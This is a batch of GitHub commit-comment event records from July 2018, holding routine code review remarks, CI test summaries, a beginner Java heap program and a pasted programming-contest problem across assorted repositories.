{"id":"7953589354","type":"CommitCommentEvent","actor":{"login":"alex-okrushko"},"repo":{"name":"alex-okrushko/backoff-rxjs"},"payload":{"comment":{"id":29679359,"position":null,"line":null,"path":null,"commit_id":"31b6fa26dc05ca3f903fbcf1d928e962518bba70","created_at":"2018-07-12T02:31:44Z","updated_at":"2018-07-12T02:31:44Z","author_association":"OWNER","body":"fixes https://github.com/alex-okrushko/backoff-rxjs/issues/3"}},"created_at":"2018-07-12T02:31:44Z"}
{"id":"7953589534","type":"CommitCommentEvent","actor":{"login":"jnifir"},"repo":{"name":"jnifir/sample-cloud-native-toolchain-tutorial-20180703135929590"},"payload":{"comment":{"id":29679360,"position":null,"line":null,"path":null,"commit_id":"19ffbf915414e37f206ad1e6685ae2e98f2e7cc4","created_at":"2018-07-12T02:31:48Z","updated_at":"2018-07-12T02:31:48Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/31b2156f-c5d9-4c6e-b219-f21ce41469d1?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180703135929590\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/bb33ba73-a7ad-4885-95ea-6f8aca4921f1?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180703135929590\") deployed [sample-cloud-native-toolchain-tutorial-20180703135929590](https://github.com/jnifir/sample-cloud-native-toolchain-tutorial-20180703135929590/releases/tag/deploy-ibm-yp-us-south-jennifer_wales-us.ibm.com-prod-20180712-023148 \"deploy-ibm-yp-us-south-jennifer_wales-us.ibm.com-prod-20180712-023148\") to [prod](https://console.bluemix.net/apps/df787b48-d3a9-46d7-96f0-15fc005fa793?env_id=ibm:yp:us-south \"ibm:yp:us-south:jennifer_wales@us.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-12T02:31:48Z"}
{"id":"7953589635","type":"CommitCommentEvent","actor":{"login":"Dancopy"},"repo":{"name":"Sooner-Competitive-Robotics/colorduino-slave"},"payload":{"comment":{"id":29679361,"position":null,"line":null,"path":null,"commit_id":"b6f1b5f1ba05708068aac0d2f03c23b8b85201bb","created_at":"2018-07-12T02:31:51Z","updated_at":"2018-07-12T02:31:51Z","author_association":"NONE","body":"Thanks for the answer. I have a few more questions:\r\n1) I saved this code (slave) in a Colorduino but it does not show anything on the screen.\r\n2) Where in the code can I write a text message?"}},"created_at":"2018-07-12T02:31:51Z"}
{"id":"7953591752","type":"CommitCommentEvent","actor":{"login":"alex-okrushko"},"repo":{"name":"alex-okrushko/backoff-rxjs"},"payload":{"comment":{"id":29679363,"position":null,"line":null,"path":null,"commit_id":"31b6fa26dc05ca3f903fbcf1d928e962518bba70","created_at":"2018-07-12T02:32:40Z","updated_at":"2018-07-12T02:32:40Z","author_association":"OWNER","body":"fixes https://github.com/alex-okrushko/backoff-rxjs/issues/2"}},"created_at":"2018-07-12T02:32:40Z"}
{"id":"7953594582","type":"CommitCommentEvent","actor":{"login":"liesauer"},"repo":{"name":"nulastudio/middleware"},"payload":{"comment":{"id":29679364,"position":null,"line":null,"path":null,"commit_id":"6aabf40c4cbc314d1ac4b84d691aeb1c445047b5","created_at":"2018-07-12T02:33:47Z","updated_at":"2018-07-12T02:33:47Z","author_association":"COLLABORATOR","body":"add Middleware::newInstance() method"}},"created_at":"2018-07-12T02:33:47Z"}
{"id":"7953596081","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29679367,"position":5,"line":222,"path":"src/libdrakvuf/drakvuf.c","commit_id":"40271fac5c9c0f8a78dd1b3bcc9676bb1cf7cb77","created_at":"2018-07-12T02:34:21Z","updated_at":"2018-07-12T02:34:21Z","author_association":"NONE","body":"Renaming of bp to sw_trap is fine. Yet, intject_trap_sw sounds a bit misleading. "}},"created_at":"2018-07-12T02:34:21Z"}
{"id":"7953597178","type":"CommitCommentEvent","actor":{"login":"hayatoito"},"repo":{"name":"mizuki1029/google-step-tsp"},"payload":{"comment":{"id":29679368,"position":162,"line":162,"path":"tsp_ga_16.java","commit_id":"4787ea62f32648260885e86bbb62913fffa79bd1","created_at":"2018-07-12T02:34:47Z","updated_at":"2018-07-12T02:34:47Z","author_association":"NONE","body":"array の コピーはSystem.arraycopy() が利用できます。こちらのほうが速いです。\r\n\r\nhttps://docs.oracle.com/javase/7/docs/api/java/lang/System.html#arraycopy(java.lang.Object,%20int,%20java.lang.Object,%20int,%20int)\r\n\r\nSystem.arraycopy(routes[i], 0, parentRoutes[i], parentRoutes[i].length);\r\n\r\nかな？ "}},"created_at":"2018-07-12T02:34:47Z"}
{"id":"7953597192","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29679369,"position":null,"line":null,"path":null,"commit_id":"d3367801bff6f7f56d183b926cc63df6d6ad17cd","created_at":"2018-07-12T02:34:47Z","updated_at":"2018-07-12T02:34:47Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/d3367801bff6f7f56d183b926cc63df6d6ad17cd"}},"created_at":"2018-07-12T02:34:47Z"}
{"id":"7953598095","type":"CommitCommentEvent","actor":{"login":"alex-okrushko"},"repo":{"name":"alex-okrushko/backoff-rxjs"},"payload":{"comment":{"id":29679374,"position":null,"line":null,"path":null,"commit_id":"8954e6d34d9f221dcb49ddda9c8eb3d4c6b00f1a","created_at":"2018-07-12T02:35:09Z","updated_at":"2018-07-12T02:35:09Z","author_association":"OWNER","body":"partially covers https://github.com/alex-okrushko/backoff-rxjs/issues/1"}},"created_at":"2018-07-12T02:35:09Z"}
{"id":"7953603046","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29679381,"position":4,"line":117,"path":"configure.ac","commit_id":"50623fcee500c3481e887dd3d689feff89542e0e","created_at":"2018-07-12T02:37:07Z","updated_at":"2018-07-12T02:37:07Z","author_association":"NONE","body":"Commit msg: \r\n\r\n- Again, please spell check your commit msg (vim: set spell will do the trick :) )\r\n- Also, ARM support provided by libvmi (instead of ARM support for libvmi)"}},"created_at":"2018-07-12T02:37:07Z"}
{"id":"7953606845","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29679385,"position":9,"line":131,"path":"src/libdrakvuf/vmi.c","commit_id":"50623fcee500c3481e887dd3d689feff89542e0e","created_at":"2018-07-12T02:38:35Z","updated_at":"2018-07-12T02:38:35Z","author_association":"NONE","body":"please remove one tab here"}},"created_at":"2018-07-12T02:38:35Z"}
{"id":"7953607108","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29679386,"position":11,"line":133,"path":"src/libdrakvuf/vmi.c","commit_id":"50623fcee500c3481e887dd3d689feff89542e0e","created_at":"2018-07-12T02:38:41Z","updated_at":"2018-07-12T02:38:41Z","author_association":"NONE","body":"same here"}},"created_at":"2018-07-12T02:38:41Z"}
{"id":"7953607673","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29679388,"position":17,"line":139,"path":"src/libdrakvuf/vmi.c","commit_id":"50623fcee500c3481e887dd3d689feff89542e0e","created_at":"2018-07-12T02:38:56Z","updated_at":"2018-07-12T02:38:56Z","author_association":"NONE","body":"Alright, I won't repeat myself from now on :)"}},"created_at":"2018-07-12T02:38:56Z"}
{"id":"7953608765","type":"CommitCommentEvent","actor":{"login":"drndrntrol"},"repo":{"name":"drndrntrol/tema"},"payload":{"comment":{"id":29679391,"position":2,"line":2,"path":"README.md","commit_id":"9fdb00a78319c83551bd4722430fafc77bf116d8","created_at":"2018-07-12T02:39:23Z","updated_at":"2018-07-12T02:39:23Z","author_association":"OWNER","body":"Zavezujem sa"}},"created_at":"2018-07-12T02:39:23Z"}
{"id":"7953609283","type":"CommitCommentEvent","actor":{"login":"xGreylee"},"repo":{"name":"dbjtech/task-system"},"payload":{"comment":{"id":29679393,"position":null,"line":null,"path":null,"commit_id":"39f164172fe00ba5833f3c0637eb824dbbbb14ea","created_at":"2018-07-12T02:39:35Z","updated_at":"2018-07-12T02:39:35Z","author_association":"CONTRIBUTOR","body":"1.更新vehicles参数说明\r\n2.更新timestamp单位为秒\r\n3.增加导出型任务的参数"}},"created_at":"2018-07-12T02:39:35Z"}
{"id":"7953610103","type":"CommitCommentEvent","actor":{"login":"AnimatorJoe"},"repo":{"name":"ByteTechLab/bytetechlab.github.io"},"payload":{"comment":{"id":29679395,"position":null,"line":null,"path":null,"commit_id":"fe6fe5c17782711ed88ffb85248579ee9af738d0","created_at":"2018-07-12T02:39:53Z","updated_at":"2018-07-12T02:39:53Z","author_association":"MEMBER","body":"Wait crap Eli how do you do this?"}},"created_at":"2018-07-12T02:39:53Z"}
{"id":"7953615282","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29679399,"position":9,"line":131,"path":"src/libdrakvuf/vmi.c","commit_id":"50623fcee500c3481e887dd3d689feff89542e0e","created_at":"2018-07-12T02:41:49Z","updated_at":"2018-07-12T02:41:49Z","author_association":"NONE","body":"Also, I would prefer renaming the function by simply removing \"wrapper_\" "}},"created_at":"2018-07-12T02:41:49Z"}
{"id":"7953618575","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29679405,"position":null,"line":null,"path":null,"commit_id":"d022a70906164211e1cfaa73227b73080583f16e","created_at":"2018-07-12T02:43:07Z","updated_at":"2018-07-12T02:43:07Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1685 of 1685 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-12T02:43:07Z"}
{"id":"7953620226","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"Wrye-Code-Collection/Wrye-Flash-FalloutNV"},"payload":{"comment":{"id":29679407,"position":null,"line":null,"path":null,"commit_id":"d68ab15b9309551e3f7fbc2c0d4d52378560ad31","created_at":"2018-07-12T02:43:49Z","updated_at":"2018-07-12T02:43:49Z","author_association":"MEMBER","body":"Thank you. I posted a new Wrye Flash for both FO3 and FNV with it added, but nobody really shares much. Thanks for testing because even with the change log I don't think people know it's there since it was not in 295."}},"created_at":"2018-07-12T02:43:49Z"}
{"id":"7953621010","type":"CommitCommentEvent","actor":{"login":"buxstore"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29679411,"position":null,"line":null,"path":null,"commit_id":"60da11d17d24df25a572de5f2a08cee1b77f39b7","created_at":"2018-07-12T02:44:09Z","updated_at":"2018-07-12T02:44:09Z","author_association":"NONE","body":"384 100 hashrate faster than cuballoon ,but pool side is very low. gtx 1070 hashrate 145KH but pool hashrate 90kh\r\n"}},"created_at":"2018-07-12T02:44:09Z"}
{"id":"7953621341","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29679412,"position":46,"line":291,"path":"src/libdrakvuf/vmi.c","commit_id":"50623fcee500c3481e887dd3d689feff89542e0e","created_at":"2018-07-12T02:44:17Z","updated_at":"2018-07-12T02:44:17Z","author_association":"NONE","body":"Please follow the coding style by aligning the second/third holding the parameters to the paranthesis of the first line. See previous coding style."}},"created_at":"2018-07-12T02:44:17Z"}
{"id":"7953625050","type":"CommitCommentEvent","actor":{"login":"Gowdhamselvam"},"repo":{"name":"Gowdhamselvam/Ruby-advanced"},"payload":{"comment":{"id":29679425,"position":null,"line":null,"path":null,"commit_id":"7496e6d50567060c4c1e24c968529fbbd43fe791","created_at":"2018-07-12T02:45:40Z","updated_at":"2018-07-12T02:45:40Z","author_association":"OWNER","body":"accessor"}},"created_at":"2018-07-12T02:45:40Z"}
{"id":"7953625877","type":"CommitCommentEvent","actor":{"login":"golumall"},"repo":{"name":"golumall/Heap"},"payload":{"comment":{"id":29679426,"position":null,"line":null,"path":null,"commit_id":"ecdf6047d3bce7d3382909bf8d29c9c674f1c4ef","created_at":"2018-07-12T02:45:55Z","updated_at":"2018-07-12T02:45:55Z","author_association":"OWNER","body":"This is simple Heap Program to initialise heap and find parent and left child,right child of parent in Heap."}},"created_at":"2018-07-12T02:45:55Z"}
{"id":"7953627639","type":"CommitCommentEvent","actor":{"login":"nrc"},"repo":{"name":"nrc/derive-new"},"payload":{"comment":{"id":29679428,"position":null,"line":null,"path":null,"commit_id":"301346f0424a20445a817f9c67891c420aa9e554","created_at":"2018-07-12T02:46:30Z","updated_at":"2018-07-12T02:46:30Z","author_association":"OWNER","body":"released 0.5.5"}},"created_at":"2018-07-12T02:46:30Z"}
{"id":"7953627712","type":"CommitCommentEvent","actor":{"login":"trevor211"},"repo":{"name":"antirez/redis"},"payload":{"comment":{"id":29679429,"position":null,"line":null,"path":null,"commit_id":"677d10b2a8ff7f13033ccfe56ffcd246dbe70fb6","created_at":"2018-07-12T02:46:32Z","updated_at":"2018-07-12T02:46:32Z","author_association":"CONTRIBUTOR","body":"Can't agree more. Thanks for your attention."}},"created_at":"2018-07-12T02:46:32Z"}
{"id":"7953628226","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29679430,"position":123,"line":533,"path":"src/libdrakvuf/vmi.c","commit_id":"50623fcee500c3481e887dd3d689feff89542e0e","created_at":"2018-07-12T02:46:42Z","updated_at":"2018-07-12T02:46:42Z","author_association":"NONE","body":"Please remove the empty line here."}},"created_at":"2018-07-12T02:46:42Z"}
{"id":"7953628365","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29679432,"position":27,"line":19,"path":"src/Algorithms/Max.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-12T02:46:44Z","updated_at":"2018-07-12T02:46:44Z","author_association":"CONTRIBUTOR","body":"I'm not sure that this coding style should be passed by the StyleCI service and I don't think that it's the valid `PSR-2` coding style.\r\nIf this can be passed by StyleCI, I will not hand on this :+1: ."}},"created_at":"2018-07-12T02:46:44Z"}
{"id":"7953628731","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29679434,"position":135,"line":545,"path":"src/libdrakvuf/vmi.c","commit_id":"50623fcee500c3481e887dd3d689feff89542e0e","created_at":"2018-07-12T02:46:54Z","updated_at":"2018-07-12T02:46:54Z","author_association":"NONE","body":"you don't need the empty line here as well."}},"created_at":"2018-07-12T02:46:54Z"}
{"id":"7953629258","type":"CommitCommentEvent","actor":{"login":"golumall"},"repo":{"name":"golumall/Heap"},"payload":{"comment":{"id":29679438,"position":null,"line":null,"path":null,"commit_id":"ecdf6047d3bce7d3382909bf8d29c9c674f1c4ef","created_at":"2018-07-12T02:47:07Z","updated_at":"2018-07-12T02:47:07Z","author_association":"OWNER","body":"import java.util.Scanner;\r\npublic class Simple_Heap\r\n{\r\n\tint []a;      //array\r\n\t int count=0;   //Number of element in heap\r\n\t int capacity;   //size of heap\r\n\t Simple_Heap(int []a,int count,int capacity)\r\n\t {\r\n\t \tthis.a=a;\r\n\t \tthis.count=count;\r\n\t \tthis.capacity=capacity;\r\n\t }\r\n int parent(int i)\r\n  {\r\n  \tif(i<0||i>count)\r\n  \t\treturn -1;\r\n  \treturn (i-1)/2;\r\n  }\r\n int leftChild(int i)\r\n  {\r\n  \tif(i<0||i>count)\r\n  \t\treturn -1;\r\n  \treturn (2*i+1);\r\n  }\r\n  int rightChild(int i)\r\n  {\r\n  \tif(i<0||i>count)\r\n  \t\treturn -1;\r\n  \treturn (2*i+2);\r\n  }\r\n  int getMin()\r\n  {\r\n  \tif(count==0)\r\n  \t\treturn -1;\r\n  \treturn a[0];\r\n  }\r\n\r\n   public static void main(String[] args) {\r\n   \t\r\n   \tint []a={1,2,3,4,5,6};\r\n\r\nSimple_Heap hp=new Simple_Heap(a,a.length,a.length);\r\nScanner sc=new Scanner(System.in);\r\nfor(int i=0;i<a.length;i++)\r\n{\r\n\tSystem.out.print(a[i]+\" \");\r\n   }\r\n   System.out.print(\"\\nEnter Index for getting parrent Node \");\r\n   int i=sc.nextInt();\r\n  System.out.println(a[hp.parent(i)]);\r\n  System.out.print(\"\\nEnter Index for Left Child Node \");\r\n    i=sc.nextInt();\r\n   System.out.println(a[hp.leftChild(i)]);\r\n   System.out.print(\"\\nEnter Index for Rightt Child Node \");\r\n    i=sc.nextInt();\r\n   System.out.println(a[hp.rightChild(i)]);\r\n   System.out.print(\"\\nMinimum element in heap \");\r\n  // int i=sc.nextInt();\r\n   System.out.println(hp.getMin());\r\n \r\n}\r\n}"}},"created_at":"2018-07-12T02:47:07Z"}
{"id":"7953629472","type":"CommitCommentEvent","actor":{"login":"samuelportodossantos"},"repo":{"name":"samuelportodossantos/dominoes_score"},"payload":{"comment":{"id":29679439,"position":null,"line":null,"path":null,"commit_id":"55b96077fde4b49c539ee2a49b90762abe6a09be","created_at":"2018-07-12T02:47:12Z","updated_at":"2018-07-12T02:47:12Z","author_association":"OWNER","body":"Agora o dominó mexicano vai ficar massa :dango: "}},"created_at":"2018-07-12T02:47:12Z"}
{"id":"7953631863","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29679443,"position":null,"line":null,"path":null,"commit_id":"bae9bc2e841a059e7306d3ca368db3256943461c","created_at":"2018-07-12T02:48:10Z","updated_at":"2018-07-12T02:48:10Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - Win64-Windows-7-VisualStudio-14: OK (2916 of 2926 tests passed, 16 test warnings)\n\nMessages:\n\n * 14 tests had: EIO diffs.\n * 4 tests had: ESO small diffs.\n * 4 tests had: Table small diffs.\n * 14 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 10 tests had: ESO big diffs.\n * 8 tests had: Table big diffs.\n * 2 tests had: ERR diffs.\n * 5 tests had: MTR big diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 613\n * Failed: 10\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bae9bc2e841a059e7306d3ca368db3256943461c-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bae9bc2e841a059e7306d3ca368db3256943461c-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T02:48:10Z"}
{"id":"7953634307","type":"CommitCommentEvent","actor":{"login":"CAROLLINE2"},"repo":{"name":"CAROLLINE2/dni"},"payload":{"comment":{"id":29679446,"position":null,"line":null,"path":null,"commit_id":"a42c6129d1d8d30a7f22998f7ca02f8a611ed3a0","created_at":"2018-07-12T02:49:05Z","updated_at":"2018-07-12T02:49:05Z","author_association":"OWNER","body":"29636905"}},"created_at":"2018-07-12T02:49:05Z"}
{"id":"7953638846","type":"CommitCommentEvent","actor":{"login":"ian-luttrell"},"repo":{"name":"ian-luttrell/lamp-site"},"payload":{"comment":{"id":29679450,"position":null,"line":null,"path":null,"commit_id":"9f7f8a7246faa6bb7f8b154fd30dedadbae73a7d","created_at":"2018-07-12T02:50:54Z","updated_at":"2018-07-12T02:50:54Z","author_association":"OWNER","body":"These changes were inspired by the answer from the user \"Your Common Sense\" to my Stack Exchange Code Review question: \r\n    https://codereview.stackexchange.com/questions/198241/password-hashing-and-sql-queries"}},"created_at":"2018-07-12T02:50:54Z"}
{"id":"7953639479","type":"CommitCommentEvent","actor":{"login":"gloriousCode"},"repo":{"name":"thrasher-/gocryptotrader"},"payload":{"comment":{"id":29679452,"position":126,"line":364,"path":"config_example.json","commit_id":"ed675bde3078c6c64f80b2044726c6461a1606f7","created_at":"2018-07-12T02:51:09Z","updated_at":"2018-07-12T02:51:09Z","author_association":"COLLABORATOR","body":"I am pleased with the arrays 🥇 "}},"created_at":"2018-07-12T02:51:09Z"}
{"id":"7953639970","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29679453,"position":148,"line":558,"path":"src/libdrakvuf/vmi.c","commit_id":"50623fcee500c3481e887dd3d689feff89542e0e","created_at":"2018-07-12T02:51:19Z","updated_at":"2018-07-12T02:51:19Z","author_association":"NONE","body":"As mentioned in the LibVMI implementation, we do not have a single-stepping functionality (yet) that is triggered by VMI_EVENT_RESPONSE_TOGGLE_SINGLESTEP. Neither in Xen, nor in LibVMI (as far as I remember, we have talked about that just before the previous pr). For now, we have to wait until your DSMC implementation will be ready for submission."}},"created_at":"2018-07-12T02:51:19Z"}
{"id":"7953640448","type":"CommitCommentEvent","actor":{"login":"hideaDev"},"repo":{"name":"hideaDev/cloud-config"},"payload":{"comment":{"id":29679454,"position":null,"line":null,"path":null,"commit_id":"8d34c018856c5fe11c73c5c4192380832fa6de82","created_at":"2018-07-12T02:51:32Z","updated_at":"2018-07-12T02:51:32Z","author_association":"OWNER","body":"213"}},"created_at":"2018-07-12T02:51:32Z"}
{"id":"7953641440","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29679456,"position":177,"line":889,"path":"src/libdrakvuf/vmi.c","commit_id":"50623fcee500c3481e887dd3d689feff89542e0e","created_at":"2018-07-12T02:51:56Z","updated_at":"2018-07-12T02:51:56Z","author_association":"NONE","body":"Same as above."}},"created_at":"2018-07-12T02:51:56Z"}
{"id":"7953644310","type":"CommitCommentEvent","actor":{"login":"Aehmlo"},"repo":{"name":"Sooner-Competitive-Robotics/colorduino-slave"},"payload":{"comment":{"id":29679460,"position":null,"line":null,"path":null,"commit_id":"b6f1b5f1ba05708068aac0d2f03c23b8b85201bb","created_at":"2018-07-12T02:53:05Z","updated_at":"2018-07-12T02:53:05Z","author_association":"CONTRIBUTOR","body":"Please consider moving this conversation to an [issue](../issues) or elsewhere; a comment on a particular commit is not the correct venue for it."}},"created_at":"2018-07-12T02:53:05Z"}
{"id":"7953644647","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29679461,"position":186,"line":802,"path":"src/libdrakvuf/vmi.c","commit_id":"50623fcee500c3481e887dd3d689feff89542e0e","created_at":"2018-07-12T02:53:12Z","updated_at":"2018-07-12T02:53:12Z","author_association":"NONE","body":"The deletion of an _existing_ empty line should not be part of this commit."}},"created_at":"2018-07-12T02:53:12Z"}
{"id":"7953646421","type":"CommitCommentEvent","actor":{"login":"vongochaiit"},"repo":{"name":"dungnguyen1661998/test2"},"payload":{"comment":{"id":29679467,"position":null,"line":null,"path":null,"commit_id":"1b7fbaadf0cb0aa8fce920bff6191509099e3032","created_at":"2018-07-12T02:53:54Z","updated_at":"2018-07-12T02:53:54Z","author_association":"COLLABORATOR","body":"bay code cai dech j v =))\r\n"}},"created_at":"2018-07-12T02:53:54Z"}
{"id":"7953649392","type":"CommitCommentEvent","actor":{"login":"sergej-proskurin"},"repo":{"name":"ufo95/drakvuf"},"payload":{"comment":{"id":29679473,"position":null,"line":null,"path":null,"commit_id":"50623fcee500c3481e887dd3d689feff89542e0e","created_at":"2018-07-12T02:55:07Z","updated_at":"2018-07-12T02:55:07Z","author_association":"NONE","body":"Alright, almost there :) Please add the double SMC support before your pull request as we do not have single-stepping support on Xen for ARM yet. "}},"created_at":"2018-07-12T02:55:07Z"}
{"id":"7953650049","type":"CommitCommentEvent","actor":{"login":"Zforw"},"repo":{"name":"Zforw/Codes"},"payload":{"comment":{"id":29679474,"position":1,"line":1,"path":"文件7_11/heap.cpp","commit_id":"b764e3404d9a783fab7798254e0b1737ae6eb922","created_at":"2018-07-12T02:55:21Z","updated_at":"2018-07-12T02:55:21Z","author_association":"OWNER","body":"C. New Year Snowmen\r\ntime limit per test2 seconds\r\nmemory limit per test256 megabytes\r\ninputstandard input\r\noutputstandard output\r\nAs meticulous Gerald sets the table and caring Alexander sends the postcards, Sergey makes snowmen. Each showman should consist of three snowballs: a big one, a medium one and a small one. Sergey's twins help him: they've already made n snowballs with radii equal to r1, r2, ..., rn. To make a snowman, one needs any three snowballs whose radii are pairwise different. For example, the balls with radii 1, 2 and 3 can be used to make a snowman but 2, 2, 3 or 2, 2, 2 cannot. Help Sergey and his twins to determine what maximum number of snowmen they can make from those snowballs.\r\n\r\nInput\r\nThe first line contains integer n (1 ≤ n ≤ 105) — the number of snowballs. The next line contains n integers — the balls' radii r1, r2, ..., rn (1 ≤ ri ≤ 109). The balls' radii can coincide.\r\n\r\nOutput\r\nPrint on the first line a single number k — the maximum number of the snowmen. Next k lines should contain the snowmen's descriptions. The description of each snowman should consist of three space-separated numbers — the big ball's radius, the medium ball's radius and the small ball's radius. It is allowed to print the snowmen in any order. If there are several solutions, print any of them."}},"created_at":"2018-07-12T02:55:21Z"}
{"id":"7953650337","type":"CommitCommentEvent","actor":{"login":"NineAndABrokePinky"},"repo":{"name":"NineAndABrokePinky/brightcove"},"payload":{"comment":{"id":29679476,"position":null,"line":null,"path":null,"commit_id":"afaf7591afe18e5fad0f91772c90eac0ed4324c1","created_at":"2018-07-12T02:55:28Z","updated_at":"2018-07-12T02:55:28Z","author_association":"OWNER","body":"This is also the completion of Story 4."}},"created_at":"2018-07-12T02:55:28Z"}
{"id":"7953655328","type":"CommitCommentEvent","actor":{"login":"JeRoNZ"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":29679485,"position":null,"line":null,"path":null,"commit_id":"23ce0690588992de6406791701251c7a380fa3c4","created_at":"2018-07-12T02:57:26Z","updated_at":"2018-07-12T02:57:26Z","author_association":"NONE","body":"Hmm. I tied your version, but it complained about Version not being defined, so I used Concrete\\Core\\Entity\\File\\Version; but now it throws an exception Unrecognized field: fID pointing back to $repo->matching($criteria)->isEmpty(); Maybe I have the wrong Version (pun intended).\r\n\r\nThe filename check does add an extra sanity check though - this is what I've just tried:\r\n\r\n```php\r\n$criteria = Criteria::create();\r\n$expr = $criteria::expr();\r\n$criteria->where($expr->eq('fvPrefix', $fv->getPrefix()));\r\n$criteria->andWhere($expr->eq('fvFilename', $fv->getFileName()));\r\n$versions = $files[0]->getFileVersions();\r\n$safeToDelete = $versions->matching($criteria)->count() > 1 ? false : true;\r\n```\r\n\r\nSeems to work when I upload a file, change the title which creates a new version and then replace the image. creating a new approved version. Deleting one of the first two old versions does not delete the file, but deleting the second one does.\r\n"}},"created_at":"2018-07-12T02:57:26Z"}
{"id":"7953656923","type":"CommitCommentEvent","actor":{"login":"EleanorRigby"},"repo":{"name":"cloudfoundry-incubator/bosh-vsphere-cpi-release"},"payload":{"comment":{"id":29679486,"position":232,"line":161,"path":"src/vsphere_cpi/spec/unit/cloud/vsphere/selection_pipeline_spec.rb","commit_id":"4d23100e3f6d77788ee499a7c2af9e5058ad4074","created_at":"2018-07-12T02:58:05Z","updated_at":"2018-07-12T02:58:05Z","author_association":"CONTRIBUTOR","body":"This is so cool. "}},"created_at":"2018-07-12T02:58:05Z"}
{"id":"7953660081","type":"CommitCommentEvent","actor":{"login":"yikeke"},"repo":{"name":"pingcap/docs"},"payload":{"comment":{"id":29679490,"position":null,"line":null,"path":null,"commit_id":"bce998ee70ebf5b592083eb0d5cd00f396e1e85a","created_at":"2018-07-12T02:59:18Z","updated_at":"2018-07-12T02:59:18Z","author_association":"NONE","body":"@lilin90 PTAL"}},"created_at":"2018-07-12T02:59:18Z"}
{"id":"7953661078","type":"CommitCommentEvent","actor":{"login":"hayatoito"},"repo":{"name":"mizuki1029/google-step-tsp"},"payload":{"comment":{"id":29679491,"position":196,"line":196,"path":"tsp_ga_16.java","commit_id":"4787ea62f32648260885e86bbb62913fffa79bd1","created_at":"2018-07-12T02:59:41Z","updated_at":"2018-07-12T02:59:41Z","author_association":"NONE","body":"boolean?"}},"created_at":"2018-07-12T02:59:41Z"}
